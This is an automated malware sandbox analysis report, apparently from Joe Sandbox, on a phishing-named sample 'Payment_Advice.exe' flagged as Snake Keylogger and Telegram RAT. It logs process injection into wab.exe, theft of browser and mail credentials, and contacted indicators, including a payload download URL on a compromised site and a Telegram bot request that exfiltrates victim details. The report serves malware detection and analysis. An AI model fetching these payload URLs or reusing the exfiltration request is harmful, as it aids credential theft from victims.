Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597186 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596750 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596516 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595064 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594500 Jump to behavior
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW+f
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Payment_Advice.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment_Advice.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E577F9 LdrInitializeThunk, 2_2_04E577F9
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3B50000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28BFE68 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481503 Sample: Payment_Advice.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for dropped file 2->48 54 8 other signatures 2->54 8 Payment_Advice.exe 1 19 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\...\Fillock161.Sys, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 58 Sample is not signed and drops a device driver 8->58 12 powershell.exe 20 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\Payment_Advice.exe, PE32 12->24 dropped 26 C:\...\Payment_Advice.exe:Zone.Identifier, ASCII 12->26 dropped 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 Powershell creates an autostart link 12->64 66 Powershell drops PE file 12->66 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 electromac.com.bo 192.185.142.133, 49731, 49732, 587 UNIFIEDLAYER-AS-1US United States 16->28 30 api.telegram.org 149.154.167.220, 443, 49730 TELEGRAMRU United Kingdom 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
192.185.142.133
 electromac.com.bo United States
46606 UNIFIEDLAYER-AS-1US true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
108.167.181.251
 www.reap.skyestates.com.mt United States
46606 UNIFIEDLAYER-AS-1US false

Contacted Domains

Name IP Active
www.reap.skyestates.com.mt 108.167.181.251 true
reallyfreegeoip.org 188.114.97.3 true
electromac.com.bo 192.185.142.133 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
mail.electromac.com.bo unknown unknown
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown